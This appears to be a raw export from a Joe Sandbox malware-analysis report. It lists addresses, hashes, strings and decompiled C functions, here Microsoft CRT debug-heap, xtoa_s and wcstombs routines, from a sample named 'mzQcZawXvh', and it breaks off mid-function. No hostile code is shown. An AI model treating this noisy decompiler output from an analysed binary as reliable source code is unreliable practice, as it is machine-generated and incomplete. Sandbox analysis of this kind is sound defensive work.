                            0x004230b7
                            0x004230be
                            0x004230c1
                            0x004230c4
                            0x004230c7
                            0x004230ca
                            0x004230cd
                            0x004230d0
                            0x004230d7
                            0x004230de
                            0x00000000
                            0x00000000
                            0x004230ea
                            0x004230ea
                            0x004230f1
                            0x004230fd
                            0x00423100
                            0x0042310d
                            0x00000000
                            0x00000000
                            0x0042310f
                            0x00423115
                            0x00423115
                            0x0042311c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423160
                            0x00423160
                            0x0042316a
                            0x00423197
                            0x004231a1
                            0x004231a1
                            0x004231a5
                            0x0042316c
                            0x0042316c
                            0x00423178
                            0x0042317f
                            0x00423184
                            0x00423187
                            0x0042318a
                            0x0042318d
                            0x0042318f
                            0x0042318f
                            0x00423192
                            0x00000000
                            0x00000000
                            0x004231ad
                            0x004231ad
                            0x00000000
                            0x00000000
                            0x004231b9
                            0x004231b9
                            0x004231c3
                            0x004231e3
                            0x004231e6
                            0x004231f0
                            0x004231f0
                            0x004231f4
                            0x004231c5
                            0x004231c5
                            0x004231d1
                            0x004231d8
                            0x004231da
                            0x004231da
                            0x004231e1
                            0x00000000
                            0x00000000
                            0x004231fc
                            0x004231fc
                            0x00423203
                            0x0042320f
                            0x00423212
                            0x0042321f
                            0x00423332
                            0x00000000
                            0x00423332
                            0x00423225
                            0x0042322b
                            0x0042322b
                            0x00423232
                            0x00000000
                            0x00423269
                            0x00423269
                            0x0042326c
                            0x00423272
                            0x00423299
                            0x00423299
                            0x0042329c
                            0x004232a2
                            0x004232c6
                            0x004232c6
                            0x004232c9
                            0x004232cf
                            0x00423308
                            0x00423319
                            0x00000000
                            0x00423319
                            0x004232d1
                            0x004232d1
                            0x004232d4
                            0x004232da
                            0x00000000
                            0x00000000
                            0x004232dc
                            0x004232dc
                            0x004232df
                            0x004232e5
                            0x00000000
                            0x00000000
                            0x004232e7
                            0x004232e7
                            0x004232ea
                            0x004232f0
                            0x00000000
                            0x00000000
                            0x004232f2
                            0x004232f2
                            0x004232f5
                            0x004232fb
                            0x00000000
                            0x00000000
                            0x004232fd
                            0x004232fd
                            0x00423300
                            0x00423306
                            0x0042330a
                            0x00000000
                            0x0042330a
                            0x00000000
                            0x00423306
                            0x004232a4
                            0x004232a4
                            0x004232a7
                            0x004232ae
                            0x00000000
                            0x004232b0
                            0x004232b3
                            0x004232b6
                            0x004232bc
                            0x004232c1
                            0x00000000
                            0x004232c1
                            0x004232ae
                            0x00423274
                            0x00423274
                            0x00423277
                            0x0042327e
                            0x00000000
                            0x00423280
                            0x00423283
                            0x00423286
                            0x0042328c
                            0x00423291
                            0x00000000
                            0x00423291
                            0x00000000
                            0x0042331b
                            0x0042331b
                            0x0042331e
                            0x00423321
                            0x00000000
                            0x00000000
                            0x00423239
                            0x00423239
                            0x0042323c
                            0x00423242
                            0x0042325e
                            0x00423261
                            0x00423244
                            0x00423244
                            0x00423247
                            0x0042324a
                            0x00423250
                            0x00423256
                            0x00423256
                            0x00000000
                            0x00000000
                            0x00423326
                            0x00423329
                            0x0042332f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423139
                            0x00423139
                            0x0042313c
                            0x0042313f
                            0x00000000
                            0x00000000
                            0x00423144
                            0x00423147
                            0x0042314d
                            0x00000000
                            0x00000000
                            0x0042312e
                            0x00423131
                            0x00423134
                            0x00000000
                            0x00000000
                            0x00423123
                            0x00423126
                            0x00423129
                            0x00000000
                            0x00000000
                            0x00423152
                            0x00423155
                            0x00423158
                            0x00000000
                            0x00000000
                            0x0042315b
                            0x00000000
                            0x00000000
                            0x00422fcb
                            0x00422fcb
                            0x00422fcd
                            0x00422fdb
                            0x00422fcf
                            0x00422fcf
                            0x00422fcf
                            0x00422feb
                            0x00422ff8
                            0x00422ffa
                            0x00422fff
                            0x00423001
                            0x00423006
                            0x0042300b
                            0x0042300d
                            0x00423012
                            0x00423018
                            0x0042301a
                            0x0042301a
                            0x00423018
                            0x0042301b
                            0x00423022
                            0x00000000
                            0x00423024
                            0x00423029
                            0x00423045
                            0x0042304d
                            0x0042305a
                            0x0042305f
                            0x00423e74
                            0x00423e81
                            0x00423e81
                            0x00423022
                            0x00422fc5
                            0x00423db0
                            0x00423db7
                            0x00423dce
                            0x00423dc2
                            0x00423dc2
                            0x00423dc2
                            0x00423dd8
                            0x00423dde
                            0x00423deb
                            0x00423ded
                            0x00423df2
                            0x00423df4
                            0x00423df9
                            0x00423dfe
                            0x00423e00
                            0x00423e05
                            0x00423e0b
                            0x00423e0d
                            0x00423e0d
                            0x00423e0b
                            0x00423e15
                            0x00423e60
                            0x00423e69
                            0x00423e6e
                            0x00423e17
                            0x00423e1c
                            0x00423e38
                            0x00423e40
                            0x00423e4d
                            0x00423e52
                            0x00423e52
                            0x00000000
                            0x00423e15
                            0x00423bba
                            0x00423bc0
                            0x00423bca
                            0x00423be4
                            0x00423bfe
                            0x00423c05
                            0x00423c09
                            0x00423c09
                            0x00423be6
                            0x00423beb
                            0x00423bef
                            0x00423bef
                            0x00423bcc
                            0x00423bd1
                            0x00423bd5
                            0x00423bd5
                            0x00423bca
                            0x00423c19
                            0x00423c25
                            0x00423c3b
                            0x00423c40
                            0x00423c40
                            0x00423c56
                            0x00423c5b
                            0x00423c64
                            0x00423c82
                            0x00423c87
                            0x00423c87
                            0x00423c8e
                            0x00423d48
                            0x00423d5b
                            0x00423d60
                            0x00000000
                            0x00423c9e
                            0x00423c9e
                            0x00423ca1
                            0x00423caa
                            0x00423cb0
                            0x00423cb0
                            0x00423cbf
                            0x00423cc7
                            0x00000000
                            0x00000000
                            0x00423cc9
                            0x00423ccc
                            0x00423cf1
                            0x00423cf6
                            0x00423cf9
                            0x00423d06
                            0x00423d14
                            0x00423d27
                            0x00423d2c
                            0x00423d3b
                            0x00000000
                            0x00423d3b
                            0x00423d08
                            0x00423d08
                            0x00000000
                            0x00423d08
                            0x00423d46
                            0x00423d63
                            0x00423d6a
                            0x00423d88
                            0x00423d8d
                            0x00423d8d
                            0x00000000
                            0x00423d6a
                            0x00423337
                            0x00423337
                            0x0042333e
                            0x00423344
                            0x0042334a
                            0x0042334d
                            0x00423353
                            0x00423360
                            0x00423366
                            0x00423366
                            0x0042336d
                            0x00000000
                            0x004236f1
                            0x004236f1
                            0x004236ff
                            0x00423702
                            0x00000000
                            0x00000000
                            0x00423374
                            0x00423377
                            0x0042337d
                            0x00423382
                            0x00423385
                            0x00423385
                            0x00000000
                            0x00000000
                            0x004234ba
                            0x004234bd
                            0x004234c2
                            0x004234c7
                            0x004234ca
                            0x004234ca
                            0x00000000
                            0x00000000
                            0x004238bd
                            0x004238bd
                            0x00000000
                            0x00000000
                            0x00423424
                            0x00423424
                            0x00423430
                            0x0042343d
                            0x0042344b
                            0x0042344b
                            0x00423451
                            0x00423454
                            0x00423460
                            0x004234b5
                            0x00000000
                            0x004234b5
                            0x0042343f
                            0x0042343f
                            0x00423449
                            0x00423465
                            0x00423468
                            0x0042346e
                            0x00423496
                            0x0042349d
                            0x004234a3
                            0x004234a6
                            0x004234a9
                            0x004234af
                            0x004234b2
                            0x00423470
                            0x00423470
                            0x00423476
                            0x00423479
                            0x0042347c
                            0x00423482
                            0x00423485
                            0x00423488
                            0x0042348a
                            0x0042348d
                            0x0042348d
                            0x00000000
                            0x0042346e
                            0x00000000
                            0x00000000
                            0x00423709
                            0x0042370c
                            0x0042370f
                            0x00423712
                            0x00423718
                            0x0042371b
                            0x00423726
                            0x00423731
                            0x00423735
                            0x0042374c
                            0x00423753
                            0x00423755
                            0x00423755
                            0x0042375c
                            0x00423763
                            0x00423771
                            0x00423774
                            0x00423783
                            0x0042378a
                            0x0042379f
                            0x0042378c
                            0x0042378c
                            0x0042378f
                            0x00423795
                            0x0042379a
                            0x0042379a
                            0x0042378a
                            0x004237a9
                            0x004237ac
                            0x004237af
                            0x004237b2
                            0x004237b5
                            0x004237b8
                            0x004237be
                            0x004237c4
                            0x004237cc
                            0x004237cd
                            0x004237d0
                            0x004237d1
                            0x004237d4
                            0x004237d5
                            0x004237dc
                            0x004237dd
                            0x004237e0
                            0x004237e1
                            0x004237e4
                            0x004237e5
                            0x004237eb
                            0x004237ec
                            0x004237fb
                            0x004237fd
                            0x00423803
                            0x00423808
                            0x00423810
                            0x00423818
                            0x00423819
                            0x0042381c
                            0x0042381d
                            0x0042382c
                            0x0042382e
                            0x0042382e
                            0x00423831
                            0x0042383b
                            0x00423840
                            0x00423846
                            0x00423848
                            0x00423850
                            0x00423851
                            0x00423854
                            0x00423855
                            0x00423863
                            0x00423865
                            0x00423865
                            0x00423846
                            0x00423868
                            0x0042386b
                            0x00423871
                            0x00423876
                            0x0042387b
                            0x00423881
                            0x00423884
                            0x00423884
                            0x00423887
                            0x00423893
                            0x00000000
                            0x00423893
                            0x00423737
                            0x00423737
                            0x00423741
                            0x00000000
                            0x00000000
                            0x00423743
                            0x00423743
                            0x00000000
                            0x00423743
                            0x00423728
                            0x00423728
                            0x00000000
                            0x00000000
                            0x00423388
                            0x00423388
                            0x00423393
                            0x0042339b
                            0x004233a2
                            0x004233a5
                            0x004233a8
                            0x00423408
                            0x004233aa
                            0x004233b1
                            0x004233b7
                            0x004233bd
                            0x004233c4
                            0x004233c7
                            0x004233cd
                            0x004233d5
                            0x004233d7
                            0x004233de
                            0x004233e5
                            0x004233f6
                            0x004233f8
                            0x004233f8
                            0x004233ff
                            0x0042340f
                            0x00423415
                            0x00423418
                            0x00000000
                            0x00000000
                            0x0042389b
                            0x0042389e
                            0x004238a1
                            0x004238a4
                            0x00000000
                            0x00000000
                            0x004235fa
                            0x004235fa
                            0x00423606
                            0x00423613
                            0x004236bd
                            0x004236bd
                            0x004236c0
                            0x004236c3
                            0x004236d7
                            0x004236dd
                            0x004236e3
                            0x004236c5
                            0x004236c5
                            0x004236cb
                            0x004236d2
                            0x004236d2
                            0x004236e5
                            0x00000000
                            0x004236e5
                            0x00423619
                            0x00423619
                            0x0042361b
                            0x00423629
                            0x0042361d
                            0x0042361d
                            0x0042361d
                            0x00423633
                            0x00423639
                            0x00423646
                            0x00423648
                            0x0042364d
                            0x0042364f
                            0x00423654
                            0x00423659
                            0x0042365b
                            0x00423660
                            0x00423666
                            0x00423668
                            0x00423668
                            0x00423666
                            0x00423670
                            0x004236b8
                            0x00000000
                            0x00423672
                            0x00423672
                            0x00423677
                            0x00423693
                            0x0042369b
                            0x004236a5
                            0x004236a8
                            0x004236ad
                            0x00000000
                            0x004236ad
                            0x00000000
                            0x00423904
                            0x00423904
                            0x0042390e
                            0x00423914
                            0x00423919
                            0x0042391f
                            0x0042391f
                            0x00000000
                            0x00000000
                            0x004238b6
                            0x004238b6
                            0x00000000
                            0x00000000
                            0x004234cd
                            0x004234d1
                            0x004234df
                            0x004234e2
                            0x004234d3
                            0x004234d3
                            0x004234d3
                            0x004234e8
                            0x004234ee
                            0x004234f4
                            0x00423500
                            0x00423506
                            0x00423509
                            0x00423591
                            0x00423595
                            0x00423597
                            0x0042359d
                            0x0042359d
                            0x004235a0
                            0x004235a7
                            0x004235aa
                            0x004235b0
                            0x004235b0
                            0x004235b0
                            0x004235b6
                            0x004235bc
                            0x004235bf
                            0x004235c7
                            0x00000000
                            0x00000000
                            0x004235c9
                            0x004235c9
                            0x004235cf
                            0x004235d4
                            0x00000000
                            0x00000000
                            0x004235d6
                            0x004235dc
                            0x004235df
                            0x004235df
                            0x004235e7
                            0x004235ed
                            0x004235f0
                            0x004235f2
                            0x00000000
                            0x0042350f
                            0x0042350f
                            0x00423513
                            0x00423515
                            0x0042351a
                            0x0042351a
                            0x0042351d
                            0x00423520
                            0x00423526
                            0x00423538
                            0x00423538
                            0x00423538
                            0x00423541
                            0x00000000
                            0x00000000
                            0x00423543
                            0x00423543
                            0x00423549
                            0x0042354e
                            0x00000000
                            0x00000000
                            0x00423550
                            0x00423550
                            0x00423559
                            0x0042355f
                            0x0042356d
                            0x00423575
                            0x00423578
                            0x00423578
                            0x00423584
                            0x00423587
                            0x00423532
                            0x00423535
                            0x00423535
                            0x0042358f
                            0x004235f5
                            0x00000000
                            0x004235f5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004238c9
                            0x004238c9
                            0x004238d3
                            0x004238d3
                            0x004238dd
                            0x004238e3
                            0x004238e5
                            0x004238ea
                            0x004238f4
                            0x004238f7
                            0x004238fb
                            0x004238fb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0042336d
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423a07
                            0x004239fe
                            0x00423922
                            0x00423922
                            0x00423922

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: _get_int64_arg$__aulldiv__aullrem
                            • String ID: 9
                            • API String ID: 2124759748-2366072709
                            • Opcode ID: 439c29d4e04a1ce833b6b49374606bd3f884bf79025c66809d345735659b33f0
                            • Instruction ID: 958585b71ec4e1e7cffd2970e66ae7bd288dbe8f9a52262c4b6f67f38b3eadf7
                            • Opcode Fuzzy Hash: 439c29d4e04a1ce833b6b49374606bd3f884bf79025c66809d345735659b33f0
                            • Instruction Fuzzy Hash: D74104B1E001299FDB24CF48D881BAEB7B5FB85315F5041EAE289A7201C7785E81CF19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CrtIsValidHeapPointer.LIBCMTD ref: 0040C8B0
                            Strings
                            • _CrtIsValidHeapPointer(pUserData), xrefs: 0040C8BC
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040C8C8, 0040C924
                            • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 0040C918
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: HeapPointerValid
                            • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                            • API String ID: 299318057-3586192058
                            • Opcode ID: 71556443649fd99b3a7a3c792a42e4ae5cfd4532829f3f0b64f762a2303ee93f
                            • Instruction ID: 5b1edb8beeaa82ea09b4a9a8117f7cbc7bc9fe910757dbbae102ee13cabbe2bb
                            • Opcode Fuzzy Hash: 71556443649fd99b3a7a3c792a42e4ae5cfd4532829f3f0b64f762a2303ee93f
                            • Instruction Fuzzy Hash: D421A2B6E40214DBEF28DF85D886B6E7361BB08314F20463BE5057A3D1C37DD951CAAA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CrtIsValidHeapPointer.LIBCMTD ref: 0040C8B0
                            Strings
                            • _CrtIsValidHeapPointer(pUserData), xrefs: 0040C8BC
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040C8C8, 0040C924
                            • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 0040C918
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: HeapPointerValid
                            • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                            • API String ID: 299318057-3586192058
                            • Opcode ID: ceabf39b8b49d35812d81ff8f62a672dae81e3241a830c5834adcd8c5a7438f4
                            • Instruction ID: 0155833def7ddef434d73729feff1c49a34bdf668cde7512271d2355b5f9d1ad
                            • Opcode Fuzzy Hash: ceabf39b8b49d35812d81ff8f62a672dae81e3241a830c5834adcd8c5a7438f4
                            • Instruction Fuzzy Hash: F321A176A44304DBDB19CF95D886BAE7771AB09314F20427BE405BA3D2C27CD901CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 26%
                            			E0041D9F6(signed int __eax) {
                            				intOrPtr _t29;
                            				void* _t33;
                            				void* _t34;
                            				void* _t46;
                            				void* _t47;
                            				void* _t48;
                            				void* _t50;
                            
                            				if(__eax <  *((intOrPtr*)(_t48 + 0x10))) {
                            					L6:
                            					 *((char*)( *((intOrPtr*)(_t48 - 4)))) = 0;
                            					 *((intOrPtr*)(_t48 - 4)) =  *((intOrPtr*)(_t48 - 4)) - 1;
                            					do {
                            						 *((char*)(_t48 - 0xd)) =  *((intOrPtr*)( *((intOrPtr*)(_t48 - 4))));
                            						 *((char*)( *((intOrPtr*)(_t48 - 4)))) =  *((intOrPtr*)( *((intOrPtr*)(_t48 - 0x14))));
                            						 *((char*)( *((intOrPtr*)(_t48 - 0x14)))) =  *((intOrPtr*)(_t48 - 0xd));
                            						 *((intOrPtr*)(_t48 - 4)) =  *((intOrPtr*)(_t48 - 4)) - 1;
                            						 *((intOrPtr*)(_t48 - 0x14)) =  *((intOrPtr*)(_t48 - 0x14)) + 1;
                            					} while ( *((intOrPtr*)(_t48 - 0x14)) <  *((intOrPtr*)(_t48 - 4)));
                            					_t29 = 0;
                            					L9:
                            					return _t29;
                            				}
                            				_t39 =  *((intOrPtr*)(_t48 + 0xc));
                            				 *((char*)( *((intOrPtr*)(_t48 + 0xc)))) = 0;
                            				asm("sbb eax, eax");
                            				 *(_t48 - 0x28) =  ~__eax;
                            				if( *((intOrPtr*)(_t48 - 8)) ==  *((intOrPtr*)(_t48 + 0x10))) {
                            					_push(L"length < sizeInTChars");
                            					_push(0);
                            					_push(0x8e);
                            					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\xtoa.c");
                            					_push(2);
                            					_t33 = L0040E1A0();
                            					_t50 = _t50 + 0x14;
                            					if(_t33 == 1) {
                            						asm("int3");
                            					}
                            				}
                            				if( *(_t48 - 0x28) != 0) {
                            					goto L6;
                            				} else {
                            					 *((intOrPtr*)(L0040EC70(_t39))) = 0x22;
                            					E00411A50(_t34, _t39, _t46, _t47, L"length < sizeInTChars", L"xtoa_s", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\xtoa.c", 0x8e, 0);
                            					_t29 = 0x22;
                            					goto L9;
                            				}
                            			}










                            0x0041d9f9
                            0x0041da67
                            0x0041da6a
                            0x0041da73
                            0x0041da76
                            0x0041da7b
                            0x0041da86
                            0x0041da8e
                            0x0041da96
                            0x0041da9f
                            0x0041daa5
                            0x0041daaa
                            0x0041daac
                            0x0041daaf
                            0x0041daaf
                            0x0041d9fb
                            0x0041d9fe
                            0x0041da07
                            0x0041da0b
                            0x0041da0e
                            0x0041da10
                            0x0041da15
                            0x0041da17
                            0x0041da1c
                            0x0041da21
                            0x0041da23
                            0x0041da28
                            0x0041da2e
                            0x0041da30
                            0x0041da30
                            0x0041da2e
                            0x0041da35
                            0x00000000
                            0x0041da37
                            0x0041da3c
                            0x0041da58
                            0x0041da60
                            0x00000000
                            0x0041da60

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041DA58
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __invalid_parameter
                            • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c$length < sizeInTChars$xtoa_s
                            • API String ID: 3730194576-2777429229
                            • Opcode ID: 24a11d41acadacee01dedb19fedbf2f675a673d4f352e5bfb49f0db0d8021383
                            • Instruction ID: edca029c9d44909ffbe0b4d634c0b10d4f764d08702c11e1372f0c19ad9a5032
                            • Opcode Fuzzy Hash: 24a11d41acadacee01dedb19fedbf2f675a673d4f352e5bfb49f0db0d8021383
                            • Instruction Fuzzy Hash: AE216F74E48188EFDB11CFA8CA81BAEBBB1AF15304F344595D440BB3D1C2756E40D726
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • R2s, xrefs: 0040C768
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040C677
                            • pHead->nBlockUse == nBlockUse, xrefs: 0040C66B
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: _memset
                            • String ID: R2s$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nBlockUse == nBlockUse
                            • API String ID: 2102423945-1773448705
                            • Opcode ID: 0463612b0868c25a9c87bda9be43d5947fc481ce5d6e1ff5036cb5e8888158fe
                            • Instruction ID: afd5d552d4ecc52918de100c4b73e795588db5783300543a43b8b0af59cbaeff
                            • Opcode Fuzzy Hash: 0463612b0868c25a9c87bda9be43d5947fc481ce5d6e1ff5036cb5e8888158fe
                            • Instruction Fuzzy Hash: 62213E78A00104EFCB18CF54DA91A6A77B2BB88304F3486A9D4052B3D1C77AEE42DF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • R2s, xrefs: 0040C768
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040C6DA
                            • _pLastBlock == pHead, xrefs: 0040C6CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: _memset
                            • String ID: R2s$_pLastBlock == pHead$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                            • API String ID: 2102423945-971578764
                            • Opcode ID: cd7403544f14ffc4bdecc3f9a8b8cdfe6febae85ccc01601febc9bb152fded13
                            • Instruction ID: 4465c9e611255e01e92da6841dce102d724569eb78a5a5ddb3b84ba72db861e0
                            • Opcode Fuzzy Hash: cd7403544f14ffc4bdecc3f9a8b8cdfe6febae85ccc01601febc9bb152fded13
                            • Instruction Fuzzy Hash: 8901A778A40104EBD714CF54D981F6AB3B2BB88304F3486AAE405673C1D375DE11DB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 84%
                            			E0041DAE6(intOrPtr __ebx, void* __edx, intOrPtr __edi, intOrPtr __esi) {
                            				intOrPtr* _t155;
                            				signed int* _t157;
                            				signed int _t162;
                            				intOrPtr* _t179;
                            				intOrPtr _t201;
                            				void* _t220;
                            				intOrPtr _t221;
                            				void* _t222;
                            				intOrPtr _t240;
                            				intOrPtr _t247;
                            				intOrPtr _t290;
                            				intOrPtr _t291;
                            				signed int _t292;
                            				void* _t294;
                            
                            				_t291 = __esi;
                            				_t290 = __edi;
                            				_t221 = __ebx;
                            				if( *(_t292 + 0x10) != 0) {
                            					 *(_t292 - 0x30) = 0 |  *(_t292 + 0xc) != 0x00000000;
                            					if( *(_t292 - 0x30) == 0) {
                            						_push(L"pwcs != NULL");
                            						_push(0);
                            						_push(0x66);
                            						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
                            						_push(2);
                            						_t220 = L0040E1A0();
                            						_t294 = _t294 + 0x14;
                            						if(_t220 == 1) {
                            							asm("int3");
                            						}
                            					}
                            					if( *(_t292 - 0x30) != 0) {
                            						_t274 =  *(_t292 + 0x14);
                            						L0040D2A0(_t292 - 0x20,  *(_t292 + 0x14));
                            						if( *(_t292 + 8) == 0) {
                            							_t155 = E0040D3B0(_t292 - 0x20);
                            							_t225 =  *_t155;
                            							if( *((intOrPtr*)( *_t155 + 0x14)) != 0) {
                            								_t227 = _t292 - 0x20;
                            								_t157 = E0040D3B0(_t292 - 0x20);
                            								_t274 =  *_t157;
                            								 *(_t292 - 4) = WideCharToMultiByte( *( *_t157 + 4), 0,  *(_t292 + 0xc), 0xffffffff, 0, 0, 0, _t292 - 0x10);
                            								if( *(_t292 - 4) == 0 ||  *(_t292 - 0x10) != 0) {
                            									 *((intOrPtr*)(L0040EC70(_t227))) = 0x2a;
                            									 *(_t292 - 0x68) = 0xffffffff;
                            									E0040D380(_t292 - 0x20);
                            									_t162 =  *(_t292 - 0x68);
                            								} else {
                            									 *(_t292 - 0x6c) =  *(_t292 - 4) - 1;
                            									E0040D380(_t292 - 0x20);
                            									_t162 =  *(_t292 - 0x6c);
                            								}
                            							} else {
                            								_t274 =  *(_t292 + 0xc);
                            								 *(_t292 - 0x64) = E00418B40(_t225,  *(_t292 + 0xc));
                            								E0040D380(_t292 - 0x20);
                            								_t162 =  *(_t292 - 0x64);
                            							}
                            						} else {
                            							if( *((intOrPtr*)( *((intOrPtr*)(E0040D3B0(_t292 - 0x20))) + 0x14)) != 0) {
                            								if( *((intOrPtr*)( *((intOrPtr*)(E0040D3B0(_t292 - 0x20))) + 0xac)) != 1) {
                            									_t240 =  *((intOrPtr*)(E0040D3B0(_t292 - 0x20)));
                            									_t274 =  *(_t240 + 4);
                            									 *(_t292 - 4) = WideCharToMultiByte( *(_t240 + 4), 0,  *(_t292 + 0xc), 0xffffffff,  *(_t292 + 8),  *(_t292 + 0x10), 0, _t292 - 0x10);
                            									if( *(_t292 - 4) == 0 ||  *(_t292 - 0x10) != 0) {
                            										if( *(_t292 - 0x10) != 0 || GetLastError() != 0x7a) {
                            											 *((intOrPtr*)(L0040EC70(_t240))) = 0x2a;
                            											 *(_t292 - 0x4c) = 0xffffffff;
                            											E0040D380(_t292 - 0x20);
                            											_t162 =  *(_t292 - 0x4c);
                            										} else {
                            											while( *(_t292 - 4) <  *(_t292 + 0x10)) {
                            												_t179 = E0040D3B0(_t292 - 0x20);
                            												_t247 =  *((intOrPtr*)(E0040D3B0(_t292 - 0x20)));
